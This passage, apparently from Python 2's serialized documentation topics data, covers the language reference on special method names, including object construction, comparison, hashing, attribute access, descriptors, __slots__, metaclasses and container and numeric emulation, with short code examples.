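\n\n A typical read loop can therefore use the empty string as its\n sentinel (a hedged sketch; "f" is assumed to be an open file object\n and "process" a placeholder):\n\n    line = f.readline()\n    while line:               # a blank line still contains a newline\n        process(line)\n        line = f.readline()\n\n 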
It is also\n possible (in cases where it might matter, for example, if you want\n to make an exact copy of a file while scanning its lines) to tell\n whether the last line of a file ended in a newline or not (yes\n this happens!).\n', 'specialnames': u'\nSpecial method names\n********************\n\nA class can implement certain operations that are invoked by special\nsyntax (such as arithmetic operations or subscripting and slicing) by\ndefining methods with special names. This is Python\'s approach to\n*operator overloading*, allowing classes to define their own behavior\nwith respect to language operators. For instance, if a class defines\na method named "__getitem__()", and "x" is an instance of this class,\nthen "x[i]" is roughly equivalent to "x.__getitem__(i)" for old-style\nclasses and "type(x).__getitem__(x, i)" for new-style classes. Except\nwhere mentioned, attempts to execute an operation raise an exception\nwhen no appropriate method is defined (typically "AttributeError" or\n"TypeError").\n\nWhen implementing a class that emulates any built-in type, it is\nimportant that the emulation only be implemented to the degree that it\nmakes sense for the object being modelled. For example, some\nsequences may work well with retrieval of individual elements, but\nextracting a slice may not make sense. (One example of this is the\n"NodeList" interface in the W3C\'s Document Object Model.)\n\n\nBasic customization\n===================\n\nobject.__new__(cls[, ...])\n\n Called to create a new instance of class *cls*. "__new__()" is a\n static method (special-cased so you need not declare it as such)\n that takes the class of which an instance was requested as its\n first argument. The remaining arguments are those passed to the\n object constructor expression (the call to the class). The return\n value of "__new__()" should be the new object instance (usually an\n instance of *cls*).\n\n Typical implementations create a new instance of the class by\n invoking the superclass\'s "__new__()" method using\n "super(currentclass, cls).__new__(cls[, ...])" with appropriate\n arguments and then modifying the newly-created instance as\n necessary before returning it.\n\n If "__new__()" returns an instance of *cls*, then the new\n instance\'s "__init__()" method will be invoked like\n "__init__(self[, ...])", where *self* is the new instance and the\n remaining arguments are the same as were passed to "__new__()".\n\n If "__new__()" does not return an instance of *cls*, then the new\n instance\'s "__init__()" method will not be invoked.\n\n "__new__()" is intended mainly to allow subclasses of immutable\n types (like int, str, or tuple) to customize instance creation. It\n is also commonly overridden in custom metaclasses in order to\n customize class creation.\n\nobject.__init__(self[, ...])\n\n Called after the instance has been created (by "__new__()"), but\n before it is returned to the caller. The arguments are those\n passed to the class constructor expression. 
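\n\n For example, the pattern described above is commonly used to\n customise the creation of an immutable type (an illustrative sketch;\n the "Inches" class is hypothetical):\n\n    >>> class Inches(float):\n    ...     def __new__(cls, feet):\n    ...         # float is immutable, so the value is fixed in __new__()\n    ...         return super(Inches, cls).__new__(cls, feet * 12.0)\n    ...\n    >>> Inches(2)\n    24.0\n\n 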
If a base class has an\n "__init__()" method, the derived class\'s "__init__()" method, if\n any, must explicitly call it to ensure proper initialization of the\n base class part of the instance; for example:\n "BaseClass.__init__(self, [args...])".\n\n Because "__new__()" and "__init__()" work together in constructing\n objects ("__new__()" to create it, and "__init__()" to customise\n it), no non-"None" value may be returned by "__init__()"; doing so\n will cause a "TypeError" to be raised at runtime.\n\nobject.__del__(self)\n\n Called when the instance is about to be destroyed. This is also\n called a destructor. If a base class has a "__del__()" method, the\n derived class\'s "__del__()" method, if any, must explicitly call it\n to ensure proper deletion of the base class part of the instance.\n Note that it is possible (though not recommended!) for the\n "__del__()" method to postpone destruction of the instance by\n creating a new reference to it. It may then be called at a later\n time when this new reference is deleted. It is not guaranteed that\n "__del__()" methods are called for objects that still exist when\n the interpreter exits.\n\n Note: "del x" doesn\'t directly call "x.__del__()" --- the former\n decrements the reference count for "x" by one, and the latter is\n only called when "x"\'s reference count reaches zero. Some common\n situations that may prevent the reference count of an object from\n going to zero include: circular references between objects (e.g.,\n a doubly-linked list or a tree data structure with parent and\n child pointers); a reference to the object on the stack frame of\n a function that caught an exception (the traceback stored in\n "sys.exc_traceback" keeps the stack frame alive); or a reference\n to the object on the stack frame that raised an unhandled\n exception in interactive mode (the traceback stored in\n "sys.last_traceback" keeps the stack frame alive). The first\n situation can only be remedied by explicitly breaking the cycles;\n the latter two situations can be resolved by storing "None" in\n "sys.exc_traceback" or "sys.last_traceback". Circular references\n which are garbage are detected when the option cycle detector is\n enabled (it\'s on by default), but can only be cleaned up if there\n are no Python-level "__del__()" methods involved. Refer to the\n documentation for the "gc" module for more information about how\n "__del__()" methods are handled by the cycle detector,\n particularly the description of the "garbage" value.\n\n Warning: Due to the precarious circumstances under which\n "__del__()" methods are invoked, exceptions that occur during\n their execution are ignored, and a warning is printed to\n "sys.stderr" instead. Also, when "__del__()" is invoked in\n response to a module being deleted (e.g., when execution of the\n program is done), other globals referenced by the "__del__()"\n method may already have been deleted or in the process of being\n torn down (e.g. the import machinery shutting down). For this\n reason, "__del__()" methods should do the absolute minimum needed\n to maintain external invariants. 
Starting with version 1.5,\n Python guarantees that globals whose name begins with a single\n underscore are deleted from their module before other globals are\n deleted; if no other references to such globals exist, this may\n help in assuring that imported modules are still available at the\n time when the "__del__()" method is called.\n\n See also the "-R" command-line option.\n\nobject.__repr__(self)\n\n Called by the "repr()" built-in function and by string conversions\n (reverse quotes) to compute the "official" string representation of\n an object. If at all possible, this should look like a valid\n Python expression that could be used to recreate an object with the\n same value (given an appropriate environment). If this is not\n possible, a string of the form "<...some useful description...>"\n should be returned. The return value must be a string object. If a\n class defines "__repr__()" but not "__str__()", then "__repr__()"\n is also used when an "informal" string representation of instances\n of that class is required.\n\n This is typically used for debugging, so it is important that the\n representation is information-rich and unambiguous.\n\nobject.__str__(self)\n\n Called by the "str()" built-in function and by the "print"\n statement to compute the "informal" string representation of an\n object. This differs from "__repr__()" in that it does not have to\n be a valid Python expression: a more convenient or concise\n representation may be used instead. The return value must be a\n string object.\n\nobject.__lt__(self, other)\nobject.__le__(self, other)\nobject.__eq__(self, other)\nobject.__ne__(self, other)\nobject.__gt__(self, other)\nobject.__ge__(self, other)\n\n New in version 2.1.\n\n These are the so-called "rich comparison" methods, and are called\n for comparison operators in preference to "__cmp__()" below. The\n correspondence between operator symbols and method names is as\n follows: "x<y" calls "x.__lt__(y)", "x<=y" calls "x.__le__(y)",\n "x==y" calls "x.__eq__(y)", "x!=y" and "x<>y" call "x.__ne__(y)",\n "x>y" calls "x.__gt__(y)", and "x>=y" calls "x.__ge__(y)".\n\n A rich comparison method may return the singleton "NotImplemented"\n if it does not implement the operation for a given pair of\n arguments. By convention, "False" and "True" are returned for a\n successful comparison. However, these methods can return any value,\n so if the comparison operator is used in a Boolean context (e.g.,\n in the condition of an "if" statement), Python will call "bool()"\n on the value to determine if the result is true or false.\n\n There are no implied relationships among the comparison operators.\n The truth of "x==y" does not imply that "x!=y" is false.\n Accordingly, when defining "__eq__()", one should also define\n "__ne__()" so that the operators will behave as expected. 
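\n\n A minimal sketch of defining the two together (the "Point" class is\n illustrative):\n\n    class Point(object):\n        def __init__(self, x, y):\n            self.x, self.y = x, y\n        def __eq__(self, other):\n            if not isinstance(other, Point):\n                return NotImplemented\n            return self.x == other.x and self.y == other.y\n        def __ne__(self, other):\n            result = self.__eq__(other)\n            if result is NotImplemented:\n                return result\n            return not result\n\n 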
See the\n paragraph on "__hash__()" for some important notes on creating\n *hashable* objects which support custom comparison operations and\n are usable as dictionary keys.\n\n There are no swapped-argument versions of these methods (to be used\n when the left argument does not support the operation but the right\n argument does); rather, "__lt__()" and "__gt__()" are each other\'s\n reflection, "__le__()" and "__ge__()" are each other\'s reflection,\n and "__eq__()" and "__ne__()" are their own reflection.\n\n Arguments to rich comparison methods are never coerced.\n\n To automatically generate ordering operations from a single root\n operation, see "functools.total_ordering()".\n\nobject.__cmp__(self, other)\n\n Called by comparison operations if rich comparison (see above) is\n not defined. Should return a negative integer if "self < other",\n zero if "self == other", a positive integer if "self > other". If\n no "__cmp__()", "__eq__()" or "__ne__()" operation is defined,\n class instances are compared by object identity ("address"). See\n also the description of "__hash__()" for some important notes on\n creating *hashable* objects which support custom comparison\n operations and are usable as dictionary keys. (Note: the\n restriction that exceptions are not propagated by "__cmp__()" has\n been removed since Python 1.5.)\n\nobject.__rcmp__(self, other)\n\n Changed in version 2.1: No longer supported.\n\nobject.__hash__(self)\n\n Called by the built-in function "hash()" and for operations on members\n of hashed collections including "set", "frozenset", and "dict".\n "__hash__()" should return an integer. The only required property\n is that objects which compare equal have the same hash value; it is\n advised to somehow mix together (e.g. using exclusive or) the hash\n values for the components of the object that also play a part in\n comparison of objects.\n\n If a class does not define a "__cmp__()" or "__eq__()" method it\n should not define a "__hash__()" operation either; if it defines\n "__cmp__()" or "__eq__()" but not "__hash__()", its instances will\n not be usable in hashed collections. If a class defines mutable\n objects and implements a "__cmp__()" or "__eq__()" method, it\n should not implement "__hash__()", since hashable collection\n implementations require that an object\'s hash value is immutable (if\n the object\'s hash value changes, it will be in the wrong hash\n bucket).\n\n User-defined classes have "__cmp__()" and "__hash__()" methods by\n default; with them, all objects compare unequal (except with\n themselves) and "x.__hash__()" returns a result derived from\n "id(x)".\n\n Classes which inherit a "__hash__()" method from a parent class but\n change the meaning of "__cmp__()" or "__eq__()" such that the hash\n value returned is no longer appropriate (e.g. by switching to a\n value-based concept of equality instead of the default identity\n based equality) can explicitly flag themselves as being unhashable\n by setting "__hash__ = None" in the class definition. 
Doing so\n means that not only will instances of the class raise an\n appropriate "TypeError" when a program attempts to retrieve their\n hash value, but they will also be correctly identified as\n unhashable when checking "isinstance(obj, collections.Hashable)"\n (unlike classes which define their own "__hash__()" to explicitly\n raise "TypeError").\n\n Changed in version 2.5: "__hash__()" may now also return a long\n integer object; the 32-bit integer is then derived from the hash of\n that object.\n\n Changed in version 2.6: "__hash__" may now be set to "None" to\n explicitly flag instances of a class as unhashable.\n\nobject.__nonzero__(self)\n\n Called to implement truth value testing and the built-in operation\n "bool()"; should return "False" or "True", or their integer\n equivalents "0" or "1". When this method is not defined,\n "__len__()" is called, if it is defined, and the object is\n considered true if its result is nonzero. If a class defines\n neither "__len__()" nor "__nonzero__()", all its instances are\n considered true.\n\nobject.__unicode__(self)\n\n Called to implement "unicode()" built-in; should return a Unicode\n object. When this method is not defined, string conversion is\n attempted, and the result of string conversion is converted to\n Unicode using the system default encoding.\n\n\nCustomizing attribute access\n============================\n\nThe following methods can be defined to customize the meaning of\nattribute access (use of, assignment to, or deletion of "x.name") for\nclass instances.\n\nobject.__getattr__(self, name)\n\n Called when an attribute lookup has not found the attribute in the\n usual places (i.e. it is not an instance attribute nor is it found\n in the class tree for "self"). "name" is the attribute name. This\n method should return the (computed) attribute value or raise an\n "AttributeError" exception.\n\n Note that if the attribute is found through the normal mechanism,\n "__getattr__()" is not called. (This is an intentional asymmetry\n between "__getattr__()" and "__setattr__()".) This is done both for\n efficiency reasons and because otherwise "__getattr__()" would have\n no way to access other attributes of the instance. Note that at\n least for instance variables, you can fake total control by not\n inserting any values in the instance attribute dictionary (but\n instead inserting them in another object). See the\n "__getattribute__()" method below for a way to actually get total\n control in new-style classes.\n\nobject.__setattr__(self, name, value)\n\n Called when an attribute assignment is attempted. This is called\n instead of the normal mechanism (i.e. store the value in the\n instance dictionary). *name* is the attribute name, *value* is the\n value to be assigned to it.\n\n If "__setattr__()" wants to assign to an instance attribute, it\n should not simply execute "self.name = value" --- this would cause\n a recursive call to itself. Instead, it should insert the value in\n the dictionary of instance attributes, e.g., "self.__dict__[name] =\n value". For new-style classes, rather than accessing the instance\n dictionary, it should call the base class method with the same\n name, for example, "object.__setattr__(self, name, value)".\n\nobject.__delattr__(self, name)\n\n Like "__setattr__()" but for attribute deletion instead of\n assignment. 
This should only be implemented if "del obj.name" is\n meaningful for the object.\n\n\nMore attribute access for new-style classes\n-------------------------------------------\n\nThe following methods only apply to new-style classes.\n\nobject.__getattribute__(self, name)\n\n Called unconditionally to implement attribute accesses for\n instances of the class. If the class also defines "__getattr__()",\n the latter will not be called unless "__getattribute__()" either\n calls it explicitly or raises an "AttributeError". This method\n should return the (computed) attribute value or raise an\n "AttributeError" exception. In order to avoid infinite recursion in\n this method, its implementation should always call the base class\n method with the same name to access any attributes it needs, for\n example, "object.__getattribute__(self, name)".\n\n Note: This method may still be bypassed when looking up special\n methods as the result of implicit invocation via language syntax\n or built-in functions. See Special method lookup for new-style\n classes.\n\n\nImplementing Descriptors\n------------------------\n\nThe following methods only apply when an instance of the class\ncontaining the method (a so-called *descriptor* class) appears in an\n*owner* class (the descriptor must be in either the owner\'s class\ndictionary or in the class dictionary for one of its parents). In the\nexamples below, "the attribute" refers to the attribute whose name is\nthe key of the property in the owner class\' "__dict__".\n\nobject.__get__(self, instance, owner)\n\n Called to get the attribute of the owner class (class attribute\n access) or of an instance of that class (instance attribute\n access). *owner* is always the owner class, while *instance* is the\n instance that the attribute was accessed through, or "None" when\n the attribute is accessed through the *owner*. This method should\n return the (computed) attribute value or raise an "AttributeError"\n exception.\n\nobject.__set__(self, instance, value)\n\n Called to set the attribute on an instance *instance* of the owner\n class to a new value, *value*.\n\nobject.__delete__(self, instance)\n\n Called to delete the attribute on an instance *instance* of the\n owner class.\n\n\nInvoking Descriptors\n--------------------\n\nIn general, a descriptor is an object attribute with "binding\nbehavior", one whose attribute access has been overridden by methods\nin the descriptor protocol: "__get__()", "__set__()", and\n"__delete__()". If any of those methods are defined for an object, it\nis said to be a descriptor.\n\nThe default behavior for attribute access is to get, set, or delete\nthe attribute from an object\'s dictionary. For instance, "a.x" has a\nlookup chain starting with "a.__dict__[\'x\']", then\n"type(a).__dict__[\'x\']", and continuing through the base classes of\n"type(a)" excluding metaclasses.\n\nHowever, if the looked-up value is an object defining one of the\ndescriptor methods, then Python may override the default behavior and\ninvoke the descriptor method instead. Where this occurs in the\nprecedence chain depends on which descriptor methods were defined and\nhow they were called. Note that descriptors are only invoked for new\nstyle objects or classes (ones that subclass "object()" or "type()").\n\nThe starting point for descriptor invocation is a binding, "a.x". 
How\nthe arguments are assembled depends on "a":\n\nDirect Call\n The simplest and least common call is when user code directly\n invokes a descriptor method: "x.__get__(a)".\n\nInstance Binding\n If binding to a new-style object instance, "a.x" is transformed\n into the call: "type(a).__dict__[\'x\'].__get__(a, type(a))".\n\nClass Binding\n If binding to a new-style class, "A.x" is transformed into the\n call: "A.__dict__[\'x\'].__get__(None, A)".\n\nSuper Binding\n If "a" is an instance of "super", then the binding "super(B,\n obj).m()" searches "obj.__class__.__mro__" for the base class "A"\n immediately preceding "B" and then invokes the descriptor with the\n call: "A.__dict__[\'m\'].__get__(obj, obj.__class__)".\n\nFor instance bindings, the precedence of descriptor invocation depends\non which descriptor methods are defined. A descriptor can define\nany combination of "__get__()", "__set__()" and "__delete__()". If it\ndoes not define "__get__()", then accessing the attribute will return\nthe descriptor object itself unless there is a value in the object\'s\ninstance dictionary. If the descriptor defines "__set__()" and/or\n"__delete__()", it is a data descriptor; if it defines neither, it is\na non-data descriptor. Normally, data descriptors define both\n"__get__()" and "__set__()", while non-data descriptors have just the\n"__get__()" method. Data descriptors with "__set__()" and "__get__()"\ndefined always override a redefinition in an instance dictionary. In\ncontrast, non-data descriptors can be overridden by instances.\n\nPython methods (including "staticmethod()" and "classmethod()") are\nimplemented as non-data descriptors. Accordingly, instances can\nredefine and override methods. This allows individual instances to\nacquire behaviors that differ from other instances of the same class.\n\nThe "property()" function is implemented as a data descriptor.\nAccordingly, instances cannot override the behavior of a property.\n\n\n__slots__\n---------\n\nBy default, instances of both old and new-style classes have a\ndictionary for attribute storage. This wastes space for objects\nhaving very few instance variables. The space consumption can become\nacute when creating large numbers of instances.\n\nThe default can be overridden by defining *__slots__* in a new-style\nclass definition. The *__slots__* declaration takes a sequence of\ninstance variables and reserves just enough space in each instance to\nhold a value for each variable. Space is saved because *__dict__* is\nnot created for each instance.\n\n__slots__\n\n This class variable can be assigned a string, iterable, or sequence\n of strings with variable names used by instances. If defined in a\n new-style class, *__slots__* reserves space for the declared\n variables and prevents the automatic creation of *__dict__* and\n *__weakref__* for each instance.\n\n New in version 2.2.\n\nNotes on using *__slots__*\n\n* When inheriting from a class without *__slots__*, the *__dict__*\n attribute of that class will always be accessible, so a *__slots__*\n definition in the subclass is meaningless.\n\n* Without a *__dict__* variable, instances cannot be assigned new\n variables not listed in the *__slots__* definition. Attempts to\n assign to an unlisted variable name raise "AttributeError". 
If\n dynamic assignment of new variables is desired, then add\n "\'__dict__\'" to the sequence of strings in the *__slots__*\n declaration.\n\n Changed in version 2.3: Previously, adding "\'__dict__\'" to the\n *__slots__* declaration would not enable the assignment of new\n attributes not specifically listed in the sequence of instance\n variable names.\n\n* Without a *__weakref__* variable for each instance, classes\n defining *__slots__* do not support weak references to their\n instances. If weak reference support is needed, then add\n "\'__weakref__\'" to the sequence of strings in the *__slots__*\n declaration.\n\n Changed in version 2.3: Previously, adding "\'__weakref__\'" to the\n *__slots__* declaration would not enable support for weak\n references.\n\n* *__slots__* are implemented at the class level by creating\n descriptors (Implementing Descriptors) for each variable name. As a\n result, class attributes cannot be used to set default values for\n instance variables defined by *__slots__*; otherwise, the class\n attribute would overwrite the descriptor assignment.\n\n* The action of a *__slots__* declaration is limited to the class\n where it is defined. As a result, subclasses will have a *__dict__*\n unless they also define *__slots__* (which must only contain names\n of any *additional* slots).\n\n* If a class defines a slot also defined in a base class, the\n instance variable defined by the base class slot is inaccessible\n (except by retrieving its descriptor directly from the base class).\n This renders the meaning of the program undefined. In the future, a\n check may be added to prevent this.\n\n* Nonempty *__slots__* does not work for classes derived from\n "variable-length" built-in types such as "long", "str" and "tuple".\n\n* Any non-string iterable may be assigned to *__slots__*. Mappings\n may also be used; however, in the future, special meaning may be\n assigned to the values corresponding to each key.\n\n* *__class__* assignment works only if both classes have the same\n *__slots__*.\n\n Changed in version 2.6: Previously, *__class__* assignment raised an\n error if either new or old class had *__slots__*.\n\n\nCustomizing class creation\n==========================\n\nBy default, new-style classes are constructed using "type()". A class\ndefinition is read into a separate namespace and the value of class\nname is bound to the result of "type(name, bases, dict)".\n\nWhen the class definition is read, if *__metaclass__* is defined then\nthe callable assigned to it will be called instead of "type()". This\nallows classes or functions to be written which monitor or alter the\nclass creation process:\n\n* Modifying the class dictionary prior to the class being created.\n\n* Returning an instance of another class -- essentially performing\n the role of a factory function.\n\nThese steps will have to be performed in the metaclass\'s "__new__()"\nmethod -- "type.__new__()" can then be called from this method to\ncreate a class with different properties. This example adds a new\nelement to the class dictionary before creating the class:\n\n   class metacls(type):\n       def __new__(mcs, name, bases, dict):\n           dict[\'foo\'] = \'metacls was here\'\n           return type.__new__(mcs, name, bases, dict)\n\nYou can of course also override other class methods (or add new\nmethods); for example defining a custom "__call__()" method in the\nmetaclass allows custom behavior when the class is called, e.g. 
not\nalways creating a new instance.\n\n__metaclass__\n\n This variable can be any callable accepting arguments for "name",\n "bases", and "dict". Upon class creation, the callable is used\n instead of the built-in "type()".\n\n New in version 2.2.\n\nThe appropriate metaclass is determined by the following precedence\nrules:\n\n* If "dict[\'__metaclass__\']" exists, it is used.\n\n* Otherwise, if there is at least one base class, its metaclass is\n used (this looks for a *__class__* attribute first and if not found,\n uses its type).\n\n* Otherwise, if a global variable named __metaclass__ exists, it is\n used.\n\n* Otherwise, the old-style, classic metaclass (types.ClassType) is\n used.\n\nThe potential uses for metaclasses are boundless. Some ideas that have\nbeen explored include logging, interface checking, automatic\ndelegation, automatic property creation, proxies, frameworks, and\nautomatic resource locking/synchronization.\n\n\nCustomizing instance and subclass checks\n========================================\n\nNew in version 2.6.\n\nThe following methods are used to override the default behavior of the\n"isinstance()" and "issubclass()" built-in functions.\n\nIn particular, the metaclass "abc.ABCMeta" implements these methods in\norder to allow the addition of Abstract Base Classes (ABCs) as\n"virtual base classes" to any class or type (including built-in\ntypes), including other ABCs.\n\nclass.__instancecheck__(self, instance)\n\n Return true if *instance* should be considered a (direct or\n indirect) instance of *class*. If defined, called to implement\n "isinstance(instance, class)".\n\nclass.__subclasscheck__(self, subclass)\n\n Return true if *subclass* should be considered a (direct or\n indirect) subclass of *class*. If defined, called to implement\n "issubclass(subclass, class)".\n\nNote that these methods are looked up on the type (metaclass) of a\nclass. They cannot be defined as class methods in the actual class.\nThis is consistent with the lookup of special methods that are called\non instances, only in this case the instance is itself a class.\n\nSee also:\n\n **PEP 3119** - Introducing Abstract Base Classes\n Includes the specification for customizing "isinstance()" and\n "issubclass()" behavior through "__instancecheck__()" and\n "__subclasscheck__()", with motivation for this functionality in\n the context of adding Abstract Base Classes (see the "abc"\n module) to the language.\n\n\nEmulating callable objects\n==========================\n\nobject.__call__(self[, args...])\n\n Called when the instance is "called" as a function; if this method\n is defined, "x(arg1, arg2, ...)" is a shorthand for\n "x.__call__(arg1, arg2, ...)".\n\n\nEmulating container types\n=========================\n\nThe following methods can be defined to implement container objects.\nContainers usually are sequences (such as lists or tuples) or mappings\n(like dictionaries), but can represent other containers as well. The\nfirst set of methods is used either to emulate a sequence or to\nemulate a mapping; the difference is that for a sequence, the\nallowable keys should be the integers *k* for which "0 <= k < N" where\n*N* is the length of the sequence, or slice objects, which define a\nrange of items. (For backwards compatibility, the method\n"__getslice__()" (see below) can also be defined to handle simple, but\nnot extended slices.) 
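\n\nFor example, a minimal mapping can be built on the "UserDict.DictMixin"\nhelper mentioned below (an illustrative sketch; the "LowerDict" class is\nhypothetical):\n\n   >>> from UserDict import DictMixin\n   >>> class LowerDict(DictMixin):\n   ...     def __init__(self):\n   ...         self._data = {}\n   ...     def __getitem__(self, key):\n   ...         return self._data[key.lower()]\n   ...     def __setitem__(self, key, value):\n   ...         self._data[key.lower()] = value\n   ...     def __delitem__(self, key):\n   ...         del self._data[key.lower()]\n   ...     def keys(self):\n   ...         return self._data.keys()\n   ...\n   >>> d = LowerDict()\n   >>> d["Spam"] = 1\n   >>> d.items()\n   [(\'spam\', 1)]\n\n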
It is also recommended that mappings provide the\nmethods "keys()", "values()", "items()", "has_key()", "get()",\n"clear()", "setdefault()", "iterkeys()", "itervalues()",\n"iteritems()", "pop()", "popitem()", "copy()", and "update()" behaving\nsimilar to those for Python\'s standard dictionary objects. The\n"UserDict" module provides a "DictMixin" class to help create those\nmethods from a base set of "__getitem__()", "__setitem__()",\n"__delitem__()", and "keys()". Mutable sequences should provide\nmethods "append()", "count()", "index()", "extend()", "insert()",\n"pop()", "remove()", "reverse()" and "sort()", like Python standard\nlist objects. Finally, sequence types should implement addition\n(meaning concatenation) and multiplication (meaning repetition) by\ndefining the methods "__add__()", "__radd__()", "__iadd__()",\n"__mul__()", "__rmul__()" and "__imul__()" described below; they\nshould not define "__coerce__()" or other numerical operators. It is\nrecommended that both mappings and sequences implement the\n"__contains__()" method to allow efficient use of the "in" operator;\nfor mappings, "in" should be equivalent of "has_key()"; for sequences,\nit should search through the values. It is further recommended that\nboth mappings and sequences implement the "__iter__()" method to allow\nefficient iteration through the container; for mappings, "__iter__()"\nshould be the same as "iterkeys()"; for sequences, it should iterate\nthrough the values.\n\nobject.__len__(self)\n\n Called to implement the built-in function "len()". Should return\n the length of the object, an integer ">=" 0. Also, an object that\n doesn\'t define a "__nonzero__()" method and whose "__len__()"\n method returns zero is considered to be false in a Boolean context.\n\nobject.__getitem__(self, key)\n\n Called to implement evaluation of "self[key]". For sequence types,\n the accepted keys should be integers and slice objects. Note that\n the special interpretation of negative indexes (if the class wishes\n to emulate a sequence type) is up to the "__getitem__()" method. If\n *key* is of an inappropriate type, "TypeError" may be raised; if of\n a value outside the set of indexes for the sequence (after any\n special interpretation of negative values), "IndexError" should be\n raised. For mapping types, if *key* is missing (not in the\n container), "KeyError" should be raised.\n\n Note: "for" loops expect that an "IndexError" will be raised for\n illegal indexes to allow proper detection of the end of the\n sequence.\n\nobject.__missing__(self, key)\n\n Called by "dict"."__getitem__()" to implement "self[key]" for dict\n subclasses when key is not in the dictionary.\n\nobject.__setitem__(self, key, value)\n\n Called to implement assignment to "self[key]". Same note as for\n "__getitem__()". This should only be implemented for mappings if\n the objects support changes to the values for keys, or if new keys\n can be added, or for sequences if elements can be replaced. The\n same exceptions should be raised for improper *key* values as for\n the "__getitem__()" method.\n\nobject.__delitem__(self, key)\n\n Called to implement deletion of "self[key]". Same note as for\n "__getitem__()". This should only be implemented for mappings if\n the objects support removal of keys, or for sequences if elements\n can be removed from the sequence. 
The same exceptions should be\n raised for improper *key* values as for the "__getitem__()" method.\n\nobject.__iter__(self)\n\n This method is called when an iterator is required for a container.\n This method should return a new iterator object that can iterate\n over all the objects in the container. For mappings, it should\n iterate over the keys of the container, and should also be made\n available as the method "iterkeys()".\n\n Iterator objects also need to implement this method; they are\n required to return themselves. For more information on iterator\n objects, see Iterator Types.\n\nobject.__reversed__(self)\n\n Called (if present) by the "reversed()" built-in to implement\n reverse iteration. It should return a new iterator object that\n iterates over all the objects in the container in reverse order.\n\n If the "__reversed__()" method is not provided, the "reversed()"\n built-in will fall back to using the sequence protocol ("__len__()"\n and "__getitem__()"). Objects that support the sequence protocol\n should only provide "__reversed__()" if they can provide an\n implementation that is more efficient than the one provided by\n "reversed()".\n\n New in version 2.6.\n\nThe membership test operators ("in" and "not in") are normally\nimplemented as an iteration through a sequence. However, container\nobjects can supply the following special method with a more efficient\nimplementation, which also does not require the object be a sequence.\n\nobject.__contains__(self, item)\n\n Called to implement membership test operators. Should return true\n if *item* is in *self*, false otherwise. For mapping objects, this\n should consider the keys of the mapping rather than the values or\n the key-item pairs.\n\n For objects that don\'t define "__contains__()", the membership test\n first tries iteration via "__iter__()", then the old sequence\n iteration protocol via "__getitem__()", see this section in the\n language reference.\n\n\nAdditional methods for emulation of sequence types\n==================================================\n\nThe following optional methods can be defined to further emulate\nsequence objects. Immutable sequences should at most only\ndefine "__getslice__()"; mutable sequences might define all three\nmethods.\n\nobject.__getslice__(self, i, j)\n\n Deprecated since version 2.0: Support slice objects as parameters\n to the "__getitem__()" method. (However, built-in types in CPython\n currently still implement "__getslice__()". Therefore, you have to\n override it in derived classes when implementing slicing.)\n\n Called to implement evaluation of "self[i:j]". The returned object\n should be of the same type as *self*. Note that missing *i* or *j*\n in the slice expression are replaced by zero or "sys.maxsize",\n respectively. If negative indexes are used in the slice, the\n length of the sequence is added to that index. If the instance does\n not implement the "__len__()" method, an "AttributeError" is\n raised. No guarantee is made that indexes adjusted this way are not\n still negative. Indexes which are greater than the length of the\n sequence are not modified. If no "__getslice__()" is found, a slice\n object is created and passed to "__getitem__()" instead.\n\nobject.__setslice__(self, i, j, sequence)\n\n Called to implement assignment to "self[i:j]". Same notes for *i*\n and *j* as for "__getslice__()".\n\n This method is deprecated. 
If no "__setslice__()" is found, or for\n extended slicing of the form "self[i:j:k]", a slice object is\n created, and passed to "__setitem__()", instead of "__setslice__()"\n being called.\n\nobject.__delslice__(self, i, j)\n\n Called to implement deletion of "self[i:j]". Same notes for *i* and\n *j* as for "__getslice__()". This method is deprecated. If no\n "__delslice__()" is found, or for extended slicing of the form\n "self[i:j:k]", a slice object is created, and passed to\n "__delitem__()", instead of "__delslice__()" being called.\n\nNotice that these methods are only invoked when a single slice with a\nsingle colon is used, and the slice method is available. For slice\noperations involving extended slice notation, or in absence of the\nslice methods, "__getitem__()", "__setitem__()" or "__delitem__()" is\ncalled with a slice object as argument.\n\nThe following example demonstrate how to make your program or module\ncompatible with earlier versions of Python (assuming that methods\n"__getitem__()", "__setitem__()" and "__delitem__()" support slice\nobjects as arguments):\n\n class MyClass:\n ...\n def __getitem__(self, index):\n ...\n def __setitem__(self, index, value):\n ...\n def __delitem__(self, index):\n ...\n\n if sys.version_info < (2, 0):\n # They won\'t be defined if version is at least 2.0 final\n\n def __getslice__(self, i, j):\n return self[max(0, i):max(0, j):]\n def __setslice__(self, i, j, seq):\n self[max(0, i):max(0, j):] = seq\n def __delslice__(self, i, j):\n del self[max(0, i):max(0, j):]\n ...\n\nNote the calls to "max()"; these are necessary because of the handling\nof negative indices before the "__*slice__()" methods are called.\nWhen negative indexes are used, the "__*item__()" methods receive them\nas provided, but the "__*slice__()" methods get a "cooked" form of the\nindex values. For each negative index value, the length of the\nsequence is added to the index before calling the method (which may\nstill result in a negative index); this is the customary handling of\nnegative indexes by the built-in sequence types, and the "__*item__()"\nmethods are expected to do this as well. However, since they should\nalready be doing that, negative indexes cannot be passed in; they must\nbe constrained to the bounds of the sequence before being passed to\nthe "__*item__()" methods. Calling "max(0, i)" conveniently returns\nthe proper value.\n\n\nEmulating numeric types\n=======================\n\nThe following methods can be defined to emulate numeric objects.\nMethods corresponding to operations that are not supported by the\nparticular kind of number implemented (e.g., bitwise operations for\nnon-integral numbers) should be left undefined.\n\nobject.__add__(self, other)\nobject.__sub__(self, other)\nobject.__mul__(self, other)\nobject.__floordiv__(self, other)\nobject.__mod__(self, other)\nobject.__divmod__(self, other)\nobject.__pow__(self, other[, modulo])\nobject.__lshift__(self, other)\nobject.__rshift__(self, other)\nobject.__and__(self, other)\nobject.__xor__(self, other)\nobject.__or__(self, other)\n\n These methods are called to implement the binary arithmetic\n operations ("+", "-", "*", "//", "%", "divmod()", "pow()", "**",\n "<<", ">>", "&", "^", "|"). For instance, to evaluate the\n expression "x + y", where *x* is an instance of a class that has an\n "__add__()" method, "x.__add__(y)" is called. 
